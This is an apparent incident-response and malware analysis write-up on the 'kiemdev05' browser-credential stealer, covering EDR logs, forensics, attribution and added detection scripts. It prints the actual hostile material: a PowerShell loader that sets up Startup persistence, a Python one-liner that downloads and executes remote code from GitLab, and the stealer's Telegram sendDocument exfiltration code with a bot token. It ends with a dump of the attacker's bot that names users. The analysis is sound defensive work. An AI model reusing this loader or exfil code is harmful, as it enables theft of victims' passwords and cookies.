
Malware: kiemdev05

EDR Log

While reviewing the EDR log, a program named synaptics.exe was flagged.
Looking at its behaviour, it spawns many Chrome child processes, connects to many IPs,
and steals passwords from several browsers into C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip (in the paths below, [TW_某IP] is a redacted Taiwanese IP and 電腦名稱 is a placeholder for the computer name).

  1. Runs the Python payload sup02.entrypoint
  2. DNS resolves gitlab.com
  3. Connects
  4. Collects Chrome information
  5. Creates files login_db, 電腦名稱, 電腦名稱\All_Passwords.txt
  6. Deletes files login_db, cards_db
  7. taskkill chrome.exe
  8. Runs Python to launch Chrome with remote debugging
  9. Modifies the Chrome registry key
  10. The same for Edge
  11. DNS resolves adsmanager.facebook.com, graph.facebook.com, mbasic.facebook.com, www.facebook.com
  12. Connects
  13. Creates Facebook_Cookies.txt
  14. DNS resolves ip-api.com
  15. Creates Temp[TW_某IP] 電腦名稱.zip
  16. Modifies Temp[TW_某IP] 電腦名稱.zip
  17. DNS resolves api.telegram.org
  18. Connects
  19. Deletes all the generated files, such as the txt/zip files

All of these actions complete within two minutes of execution.
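As an added example that is not part of the original write-up or the malware's code, the script below turns the behaviour chain above into detection logic and runs it over a few constructed EDR events. The event fields (ts, type, image, cmdline, path) are an assumed, simplified export format; the sample command lines mirror the shapes listed in the IoC section (remote exec one-liner, taskkill of the browser, headless launch with --remote-debugging-port), with placeholder hosts.

```python
"""Detect the stealer chain: remote-exec Python loader -> browser kill -> headless
remote-debug relaunch, all within a short window. Added example; event shape is assumed."""
import re
from datetime import datetime

# Constructed events modelled on the timeline in the write-up (synaptics.exe = renamed pythonw.exe).
SAMPLE_EVENTS = [
    {"ts": "2025-01-10T08:00:00", "type": "file_create",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk"},
    {"ts": "2025-01-10T08:00:05", "type": "process", "image": r"C:\Users\Public\ChromeApplication\synaptics.exe",
     "cmdline": 'synaptics.exe -c "import requests;exec(requests.get(\'https://gitlab.example/raw/x.entrypoint\', verify=False).text)"'},
    {"ts": "2025-01-10T08:00:40", "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM chrome.exe"},
    {"ts": "2025-01-10T08:00:42", "type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": 'chrome.exe --remote-debugging-port=9222 --user-data-dir="C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data" --remote-allow-origins=* --headless --window-size=1,1'},
    {"ts": "2025-01-10T09:30:00", "type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},          # benign launch
    {"ts": "2025-01-10T09:30:10", "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM notepad.exe"},                      # benign kill
]

CMDLINE_RULES = {
    # Python one-liner that fetches and exec()s remote code (the stage-2 loader).
    "python_remote_exec": [re.compile(r"exec\s*\(\s*requests\.get\s*\(", re.I)],
    # Browser relaunched with a DevTools port and headless: cookie/session theft via CDP.
    "browser_remote_debug": [re.compile(r"--remote-debugging-port=\d+", re.I),
                             re.compile(r"--headless\b", re.I)],
    # Forced browser kill so the profile databases are unlocked for copying.
    "browser_kill": [re.compile(r"\btaskkill\b.*?/IM\s+(chrome|msedge|firefox|brave)\.exe", re.I)],
}
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)


def match_rules(event):
    """Return the rule names that fire on a single event."""
    hits = []
    if event["type"] == "process":
        for name, patterns in CMDLINE_RULES.items():
            if all(p.search(event["cmdline"]) for p in patterns):
                hits.append(name)
    elif event["type"] == "file_create" and STARTUP_LNK.search(event["path"]):
        hits.append("startup_lnk_created")
    return hits


def scan(events):
    """Flatten events into (timestamp, rule) hits, oldest first."""
    out = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule in match_rules(ev):
            out.append((datetime.fromisoformat(ev["ts"]), rule))
    return out


def find_stealer_chains(hits, window_s=120):
    """Correlate: a remote-exec hit followed within window_s by both a browser kill
    and a headless remote-debug launch. The write-up notes the chain ran inside two minutes."""
    starts = []
    for i, (t0, rule) in enumerate(hits):
        if rule != "python_remote_exec":
            continue
        later = {r for t, r in hits[i + 1:] if (t - t0).total_seconds() <= window_s}
        if {"browser_kill", "browser_remote_debug"} <= later:
            starts.append(t0.isoformat())
    return starts


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for t, r in found:
        print(t.isoformat(), r)
    print("stealer chains starting at:", find_stealer_chains(found))
```

The single-event rules fire on their own (a headless browser with a DevTools port open to any origin is worth an alert by itself); the correlation step is what separates this stealer from an administrator killing a hung browser, since the benign taskkill and plain Chrome launch in the sample never form a chain.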

Files created by the execution of sup02.entrypoint, ordered by the creation time observed:

C:\Users\admin\AppData\Local\Temp\login_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\All_Passwords.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Profile 1.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Default.txt
C:\Users\admin\AppData\Local\Temp\cards_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Edge_Default.txt
C:\Users\admin\AppData\Local\Temp\PC-C002292\Facebook_Cookies.txt
C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip
Outbound connection events (IPs) from the machine seen in the EDR log:
 
Direct connections
172.65.251.78:443 gitlab.com
127.0.0.1:9222
31.13.87.1:443
31.13.87.36:443
208.95.112.1:80 ip-api.com
149.154.167.220:443 api.telegram.org
 
Sites browsed through the Chrome remote-debugging connection on 127.0.0.1:9222
142.250.198.78:80
142.250.204.35:443
142.250.196.196:443
74.125.204.84:443
142.250.204.42:443
142.250.204.46:443
142.250.77.10:443
142.250.198.78:443
142.250.66.68:443
142.250.198.74:443
142.250.157.188:5228
142.250.196.206:443
142.250.196.195:443
 
Sites browsed through the Edge remote-debugging connection on 127.0.0.1:9222
13.107.42.16:443
204.79.197.203:443
13.107.21.239:443
203.69.81.97:443
203.69.81.152:443
20.255.46.225:443
204.79.197.237:443
203.69.81.155:443
204.79.197.203:443
61.220.62.226:443
203.74.95.35:443
210.71.227.123:443
3.169.137.63:443
52.231.230.148:443
104.116.18.28:443
20.42.73.26:443
20.24.121.134:443
104.116.16.155:443
40.104.20.2:443

Tracing backwards, explorer.exe executed the command "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"

It was launched from an lnk file, C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk; the path is under Startup, so it runs at boot.

Inspecting the machine

Connecting to the machine directly, the folder containing C:\Users\Public\ChromeApplication\synaptics.exe holds:

  1. DLLs folder
  2. Lib folder
  3. definitions.py
  4. python310.dll
  5. synaptics.exe
  6. vcruntime140.dll

Lib contains the Python standard library.

The command in WindowsSecurity.lnk is "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"

Checking synaptics.exe shows it is pythonw.exe, version 3.10.11.

OMENScan/AChoirX: ReWrite of AChoir in Go for Cross Platform was also run to collect forensic data.

Other investigation

Looking at https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint,
the main program is obfuscated:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c%1Cm*|PH5ognzVzu}zY<71~YU3R9OlSzhTNU|hA48c4|3_=1lf}#u11PBcXNq`VTbcC~_>!u^R-XQZb-=d$OE-N~|H*h~fU$yo=$LTD0boUFaO~CpgmZUXn{kQz`M}Oah?^gJB|L6by`V#y&_`ttdpI=|zUW*s&^+zw^_t(qI|Mq_dr|_+AUz8X1MS1=0>tDY7*H>U*U|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|`_?r>Pg=m4C6md3||%sUMUNzkPjuS-kLXc|N|``uuxc!n2f5#z*1fd-_TE^qzheKEJ15317XZUkhKqr{4(Qyr(}Be)OJxD}4K&{#f|&d-|R5-Fx~I;V19uPlcbpr+*^+$$R=U;b&p`+4xiQ&xAjFeY^Kp#%J^A!q4CRwecU!UkJZ2e<}R({rfk@pPPRn{KdO}Wc<qfweahAe{1}u`B%bUnSU+(wfQ%~-@G6DvGKR&Z-n2x`#U3I{+;l5@BWDqHDf}|j0<ryAtcPd7yjN%3d#51erlx5w2(G4LdN_D;UB_df1+lUpQ+i+C*@C-Kl`Uo!apiMSN_94y$JtN`GxY!Fol#qSN<YQVdYoKufsH_{H5|&VVYMz|MSn4zy6n3p`iSY^0(m;M9nL|Q47EQAQV+ZExxt2@`-*)MSl1C^78V#@ckluw6>?;eF#OSUcdaQ?5LuruH=Jdsj{aXtnlEEq+&r)<%6Q8K79G)?nL;@k8Md;Ho4W#6y-3-..................

On the GitLab project page there is another file, zk.entrypoint.


And this user has created only this one project.


Searching for kiemdev05 finds:

  1. StrikeReady Labs on X: "One of our favorite hunts is flagging on language-specific content. Although non-english attacks are not rare, when you combine with prevalence, it can be a good thread. This susp VN actor is targeting in Romanian. Zip drops a pass protected rar, pass is "kiemdev05" https://t.co/aCaNNnHj9s" / X
    This post says the user of this ID may be from Vietnam.
  2. Find method to Decompile .NET Core Single File - Exetools
    The poster of this thread uses the same ID and is in Vietnam.

Searching Google for "blackhat_code/software" finds Automated Malware Analysis - Joe Sandbox Cloud Basic.

The IoC page lists WindowsSecurity.lnk, created by powershell, so it is fairly certain this is the same malware.


Looking at how it starts, execution begins with Lakatos, K#U00f6ves and Partners.bat:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lakatos, K#U00f6ves and Partners.bat" "


The content of Lakatos, K#U00f6ves and Partners.bat is as follows:

powershell  -ep by"pa"ss -w hi"dd"en -enc ZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAI"AAgACAAIAAkAFMAaABvAHcAVwBpAG"…"AgAGkAZgAgACgAJABoAHcA"…"AD0AIAAkAFQAZQByAG0A"…"wA6AFwAVQBzAGUAcgBz"…

After base64 decoding it, we get:

function Hide-ConsoleWindow() {
    $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
    $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
  
    $hwnd = (Get-Process -PID $pid).MainWindowHandle
    if ($hwnd -ne [System.IntPtr]::Zero) {
      $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
    } else {
  
      $UniqueWindowTitle = New-Guid
      $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
      $StringBuilder = New-Object System.Text.StringBuilder 1024
      $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
     
      $hwnd = $TerminalProcess.MainWindowHandle
      if ($hwnd -ne [System.IntPtr]::Zero) {
        $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
      } else {
        Write-Host "Failed to hide the console window."
      }
    }
  }
Hide-ConsoleWindow
$dst = 'C:\Users\Public\ChromeApplication'; Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"

$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"

This script creates C:\Users\Public\ChromeApplication and extracts Document_Secure\securedoc.rar into it:

$dst = 'C:\Users\Public\ChromeApplication'; 
Add-Type -AssemblyName System.IO.Compression.FileSystem; 
if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"

It then creates WindowsSecurity.lnk, embeds the payload, and executes it.
The firewall log confirms a connection to the Telegram bot right after the creation:

$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";
$obj = New-Object -ComObject WScript.Shell;
$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");
$link.WindowStyle = 7;
$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";
$link.Arguments = "-c `"$payload`"";
$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"
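The loader above hides its keywords from naive string matching by splitting them with quotes (by"pa"ss, hi"dd"en, and the base64 blob itself) and by passing the script as a UTF-16LE base64 -enc argument. As an added example that is not part of this write-up, the helper below normalises such a command line, decodes the -EncodedCommand argument the way PowerShell does, and pulls out the persistence artefacts a triage analyst wants (Startup .lnk path, target executable, URLs, archive password). The sample command and script are constructed with placeholder paths and hosts, not the malware's own.

```python
"""Decode an obfuscated 'powershell -enc' loader and extract triage indicators. Added example."""
import base64
import re

# Constructed PowerShell script in the same shape as the decoded loader (placeholder paths/hosts).
SAMPLE_SCRIPT = r'''Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\App\" -p"p4ssw0rd"
$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk")
$link.TargetPath = "C:\Users\Public\App\runner.exe"
$link.Arguments = "-c `"import requests;exec(requests.get('https://example.invalid/stage2.py').text)`""
$link.Save()'''

# Constructed command line using the same split-quote trick as the .bat; PowerShell's -enc
# argument is base64 over the UTF-16LE bytes of the script.
SAMPLE_CMD = ('powershell  -ep by"pa"ss -w hi"dd"en -enc '
              + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())

# A quoted run with no whitespace inside a token (by"pa"ss) is cmd.exe quoting, not an argument
# boundary; dropping the quotes restores the keyword. Quoted paths without spaces lose their
# quotes too, which is harmless for matching purposes.
SPLIT_QUOTE = re.compile(r'"([^"\s]*)"')
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def normalize_cmdline(cmd):
    """Join split-quoted tokens so by"pa"ss -> bypass and the base64 blob is contiguous."""
    return SPLIT_QUOTE.sub(r"\1", cmd)


def decode_encoded_command(cmd):
    """Return the decoded script from a -enc/-EncodedCommand argument, or None if absent."""
    m = ENC_ARG.search(normalize_cmdline(cmd))
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_indicators(script):
    """Pull persistence and staging artefacts out of the decoded script text."""
    return {
        "startup_lnk": re.findall(r'CreateShortcut\("([^"]+)"\)', script),
        "target_exe": re.findall(r'TargetPath\s*=\s*"([^"]+)"', script),
        "urls": re.findall(r"https?://[^\s'\")]+", script),
        "archive_password": re.findall(r'-p"([^"]+)"', script),
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_CMD)
    print(decoded)
    print(extract_indicators(decoded))
```

Normalising before matching is the important step: an EDR rule that looks for "-ep bypass" or "-enc" in the raw command line misses this loader entirely, which is exactly why the split quotes are there.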


Complete event flow diagram


Forensic investigation

From the sections above and below, the overall operation of the malware is roughly clear; I want to find out a few more things:

  1. The Telegram account the data is sent to
  2. Whether there is a loader (an earlier piece of malware) that dropped these files
  3. How the PowerShell payload was executed
  4. Who the attacker is
  5. Whether password.zip can be recovered
  6. Whether Document_Secure\securedoc.rar can be found
  7. How the bat file got in and was executed

On the machine, the creation time of WindowsSecurity.lnk shows it was created two weeks ago.
Since the machine has been rebooted since then, earlier records cannot be viewed.
To look at file modification history, see 渗透技巧——Windows下NTFS文件的USN Journal (a Chinese article on the NTFS USN Journal).
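The USN Journal is the artefact that can still show the stealer's short-lived txt/zip files after the EDR file log is gone. As an added example that is not from this write-up or the linked article, the parser below decodes USN_RECORD_V2 structures (the 60-byte header followed by a UTF-16LE file name) from a constructed journal extract and pairs each FILE_CREATE with the later FILE_DELETE of the same name, surfacing files that existed only briefly. The build_usn_v2 helper exists only to construct the sample records; the timestamps and names are made up.

```python
"""Parse USN_RECORD_V2 entries and flag files created and deleted within a short window. Added example."""
import struct
from datetime import datetime, timedelta, timezone

# USN_RECORD_V2: RecordLength, MajorVersion, MinorVersion, FileReferenceNumber,
# ParentFileReferenceNumber, Usn, TimeStamp (FILETIME), Reason, SourceInfo, SecurityId,
# FileAttributes, FileNameLength, FileNameOffset -> 60 bytes, then the UTF-16LE name.
_HDR = struct.Struct("<IHHQQQQIIIIHH")
USN_REASONS = {
    0x00000001: "DATA_OVERWRITE", 0x00000002: "DATA_EXTEND", 0x00000004: "DATA_TRUNCATION",
    0x00000100: "FILE_CREATE", 0x00000200: "FILE_DELETE", 0x00001000: "RENAME_OLD_NAME",
    0x00002000: "RENAME_NEW_NAME", 0x80000000: "CLOSE",
}
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    """FILETIME is 100-ns ticks since 1601-01-01 UTC."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_usn_v2(buf):
    """Yield one dict per USN_RECORD_V2 in buf, skipping the zero padding between journal pages."""
    off = 0
    while off + 4 <= len(buf):
        rec_len = struct.unpack_from("<I", buf, off)[0]
        if rec_len == 0:                      # padding: step to the next 8-byte boundary
            off += 8
            continue
        (rec_len, major, minor, _frn, _parent, usn, ts, reason, _src, _sid,
         _attrs, name_len, name_off) = _HDR.unpack_from(buf, off)
        if major != 2:
            raise ValueError(f"unsupported USN record version {major}.{minor}")
        name = buf[off + name_off: off + name_off + name_len].decode("utf-16-le")
        yield {"usn": usn, "time": filetime_to_dt(ts), "file": name,
               "reasons": [n for bit, n in USN_REASONS.items() if reason & bit]}
        off += rec_len


def short_lived_files(records, max_age_s=120):
    """Pair FILE_CREATE with a later FILE_DELETE of the same name; return (name, lifetime_s)
    for files that lived at most max_age_s seconds (the stealer's staging files lived under 2 min)."""
    created, out = {}, []
    for r in records:
        if "FILE_CREATE" in r["reasons"]:
            created.setdefault(r["file"], r["time"])
        if "FILE_DELETE" in r["reasons"] and r["file"] in created:
            age = (r["time"] - created.pop(r["file"])).total_seconds()
            if age <= max_age_s:
                out.append((r["file"], age))
    return out


def build_usn_v2(usn, when, name, reason, frn=0x1000000000001, parent=0x5000000000005):
    """Construct a well-formed record (test data only; real journals come from $Extend\\$UsnJrnl:$J)."""
    raw = name.encode("utf-16-le")
    length = (60 + len(raw) + 7) & ~7          # records are 8-byte aligned
    ft = (when - _EPOCH_1601) // timedelta(microseconds=1) * 10
    hdr = _HDR.pack(length, 2, 0, frn, parent, usn, ft, reason, 0, 0, 0x20, len(raw), 60)
    return (hdr + raw).ljust(length, b"\0")


# Constructed journal extract: a staging file created, extended, deleted 95 s later; a normal
# document that lives for hours; 16 bytes of page padding in between.
T0 = datetime(2025, 1, 10, 8, 0, 5, tzinfo=timezone.utc)
SAMPLE_JOURNAL = b"".join([
    build_usn_v2(1000, T0, "All_Passwords.txt", 0x100 | 0x80000000),
    build_usn_v2(1001, T0 + timedelta(seconds=3), "All_Passwords.txt", 0x2 | 0x80000000),
    build_usn_v2(1002, T0 + timedelta(seconds=20), "report.docx", 0x100 | 0x80000000),
    build_usn_v2(1003, T0 + timedelta(seconds=95), "All_Passwords.txt", 0x200 | 0x80000000),
    b"\0" * 16,
    build_usn_v2(1004, T0 + timedelta(hours=5), "report.docx", 0x200 | 0x80000000),
])

if __name__ == "__main__":
    recs = list(parse_usn_v2(SAMPLE_JOURNAL))
    for r in recs:
        print(r["time"].isoformat(), r["file"], r["reasons"])
    print("short-lived:", short_lived_files(recs))
```

On a live image the same parser can be pointed at the raw $J stream extracted with a forensic tool; the journal keeps a record of the name and reason even after the file's data and MFT entry are gone, which is what makes it useful when the malware cleans up after itself.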

See whether the $LogFile and $MFT files can be parsed.

$LogFile

jschicht/LogFileParser: Parser for $LogFile on NTFS can extract the contents into csv files for review.
The Free Version can import all the evtx files to view together, but apparently cannot view $LogFile content.

$MFT

kacos2000/MFT_Record_Viewer: $MFT Record Viewer
Master File Table and Computer Forensics
Windows Master File Table (MFT) in Digital Forensics — MCSI Library

LastActivity.csv

This file records a fairly complete timeline of activity.
It shows boot/shutdown and sleep times, and confirms the machine was indeed rebooted at that point.

EVTX

Download LogViewPlus is easier to use; it can merge all the files for viewing.
NVISOsecurity/evtx-hunter: evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files. It can be used to view statistics.

In the Windows PowerShell log the execution record of the PowerShell payload mentioned above is visible, at the same time as the creation of WindowsSecurity.lnk:

"Registry" 提供者為 Started。

詳細資料: 
	ProviderName=Registry
	NewProviderState=Started

	SequenceNumber=1

	HostName=ConsoleHost
	HostVersion=5.1.19041.5247
	HostId=1f132efa-416b-4ce6-b7cf-b48accaa8911
	HostApplication=powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
	EngineVersion=
	RunspaceId=
	PipelineId=
	CommandName=
	CommandType=
	ScriptName=
	CommandPath=
	CommandLine=

The trail ends here: there is no file operation log, and the reboot left the data incomplete.
The creation and execution of the .bat file, Document_Secure\securedoc.rar and its cmdline cannot be found; the earliest traceable point is the execution of the PowerShell payload.
There may be an earlier executable that loads it.

Memory analysis

Because it uses ordinary Python libraries and deletes the files it generates, related information cannot be found through memory analysis.

sup02.entrypoint analysis

For details see kiemdev05 sup02.entrypoint analysis.
It contains statut='Không Rõ Trạng Thái',
which is Vietnamese for "status unknown", further confirming it was written by a Vietnamese speaker.

The other file, zk.entrypoint, did not show up in this incident but has also been analysed; see kiemdev05 zk.entrypoint.

Telegram API

In the source code, the stolen files are sent out through a Telegram bot:

TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
CHAT_ID_NEW='-1002426006531'
CHAT_ID_RESET='-1002489276039'
with open(archive_path,'rb') as f:
    response=requests.post(
        f"https://api.telegram.org/bot{TOKEN_BOT}/sendDocument",
        params={'chat_id':CHAT_ID, 'caption':message_body, 'protect_content':True, 'disable_web_page_preview':True},
        files={'document':f},
    )
    response.raise_for_status()

Check whether any information can be obtained from the API.
The API for viewing this channel's messages is https://api.telegram.org/bot{token}/getUpdates
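Before querying anything, the useful first step is to extract the Telegram indicators from the stealer source and turn them into detection. As an added example that is not part of this write-up, the script below pulls bot tokens, chat ids and contacted hosts out of a constructed snippet shaped like the exfil routine above (the token and chat ids are fake), and flags proxy log lines that upload to any Telegram bot without needing the token in advance. The proxy log format (time, source IP, method, URL, status, bytes) is assumed and the lines are constructed.

```python
"""Extract Telegram exfil indicators from stealer source and detect bot uploads in proxy logs. Added example."""
import re

# Constructed snippet in the shape of the stealer's exfil routine; token and chat ids are fake.
SAMPLE_SOURCE = """
TOKEN_BOT='1234567890:AAHexampleTOKENexampleTOKENexampleT'
CHAT_ID_NEW='-1001111111111'
CHAT_ID_RESET='-1002222222222'
r = requests.post(f"https://api.telegram.org/bot{TOKEN_BOT}/sendDocument", params={'chat_id': CHAT_ID_NEW})
geo = requests.get('http://ip-api.com/json/?fields=8195').json()
"""

# Constructed proxy log lines: '<time> <src_ip> <method> <url> <status> <bytes>'.
SAMPLE_PROXY_LOG = [
    "2025-01-10T08:01:50Z 10.0.0.12 POST https://api.telegram.org/bot1234567890:AAHexampleTOKENexampleTOKENexampleT/sendDocument 200 184322",
    "2025-01-10T08:01:51Z 10.0.0.12 GET http://ip-api.com/json/?fields=8195 200 140",
    "2025-01-10T08:02:10Z 10.0.0.30 GET https://api.telegram.org/bot9876543210:AAGotherTokenOtherTokenOtherTokenXY/getUpdates 200 77",
    "2025-01-10T08:03:00Z 10.0.0.40 GET https://www.example.invalid/ 200 5120",
]

# A bot token is '<bot user id>:<secret>'; the numeric prefix is the bot's own Telegram user id,
# which is why the dumper output below reports ID 7688244721 for the page's token.
TOKEN_RE = re.compile(r"\b(\d{8,12}):([A-Za-z0-9_-]{30,})")
CHAT_RE = re.compile(r"CHAT_ID\w*\s*=\s*['\"](-?\d+)['\"]")
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+[^\s'\"]*")
HOST_RE = re.compile(r"https?://([^/\s'\"]+)")
# Any upload to a bot (sendDocument/sendMessage/sendPhoto) from a workstation is suspicious
# regardless of which token is used, so the rule matches the URI shape, not a specific token.
EXFIL_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/send(Document|Message|Photo)", re.I)


def extract_iocs(src):
    """Return bot ids, full tokens, chat ids and contacted hosts found in the source text."""
    tokens = TOKEN_RE.findall(src)
    return {
        "bot_ids": [bot for bot, _ in tokens],
        "bot_tokens": [f"{bot}:{secret}" for bot, secret in tokens],
        "chat_ids": CHAT_RE.findall(src),
        "hosts": sorted({HOST_RE.match(u).group(1) for u in URL_RE.findall(src)}),
    }


def flag_telegram_exfil(log_lines):
    """Return the source IPs of log lines that upload content to a Telegram bot."""
    flagged = []
    for line in log_lines:
        parts = line.split()
        if len(parts) >= 4 and EXFIL_RE.search(parts[3]):
            flagged.append(parts[1])
    return flagged


if __name__ == "__main__":
    print(extract_iocs(SAMPLE_SOURCE))
    print("hosts uploading to a Telegram bot:", flag_telegram_exfil(SAMPLE_PROXY_LOG))
```

The bot id and chat ids are what to hand to the abuse report and to a blocklist; the URI-shape rule is what catches the next sample from the same actor after the token has been rotated.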

Trying to collect information from the Telegram bot API

  1. Telegram Bot API related methods
  2. GitHub - soxoj/telegram-bot-dumper: 🔪 Dumper & ripper for Telegram bots by token. This tool extracts the information directly and listens for new messages.
ID: 7688244721
Name: data ve ne
Username: @data_015_bot - https://t.me/data_015_bot
Dumping history from 200 to 0...
Empty messages x4
[5][830655559][2024-12-21 15:41:19+00:00] /start
====================
NEW USER DETECTED: 830655559
First name: None
Last name: None
User has no username
Empty messages x6
[8][6893446818][2024-12-21 18:44:24+00:00] /start
====================
NEW USER DETECTED: 6893446818
First name: supremeo
Last name: rodriguo
Username: @rodriguotavone585353853 - https://t.me/rodriguotavone585353853
Empty messages x8
[11][7063152197][2024-12-24 01:44:39+00:00] /start
====================
NEW USER DETECTED: 7063152197
First name: C0NJURER
Last name: None
Username: @C0NJURERR - https://t.me/C0NJURERR
Saving photo 4902486628019318169...
Empty messages x8
[12][1079398712][2025-01-04 15:57:40+00:00] MessageActionChatAddUser(users=[7688244721])
Empty messages x8
[13][1079398712][2025-01-04 15:58:38+00:00] MessageActionChatMigrateTo(channel_id=2271537412)
Empty messages x8
[14][1079398712][2025-01-04 15:59:17+00:00] MessageActionChatCreate(title='Data_Reset', users=[1079398712, 7688244721])
Empty messages x8
[15][1079398712][2025-01-04 15:59:17+00:00] MessageActionSetMessagesTTL(period=2678400)
Empty messages x8
[16][1079398712][2025-01-04 16:00:07+00:00] MessageActionChatMigrateTo(channel_id=2399198378)
Empty messages x191
Saving history of 830655559 as a text...
Saving history of 6893446818 as a text...
Saving history of 7063152197 as a text...
Saving history of 4761447413 as a text...
Saving history of 4615328488 as a text...
History was fully dumped.
Press Ctrl+C to stop listeting for new messages...

/getchatadministrators

{
  "ok": true,
  "result": [
    {
      "user": {
        "id": 7688244721,
        "is_bot": true,
        "first_name": "data ve ne",
        "username": "data_015_bot"
      },
      "status": "administrator",
      "can_be_edited": false,
      "can_manage_chat": true,
      "can_change_info": false,
      "can_delete_messages": false,
      "can_invite_users": false,
      "can_restrict_members": false,
      "can_pin_messages": false,
      "can_manage_topics": false,
      "can_promote_members": false,
      "can_manage_video_chats": false,
      "can_post_stories": false,
      "can_edit_stories": false,
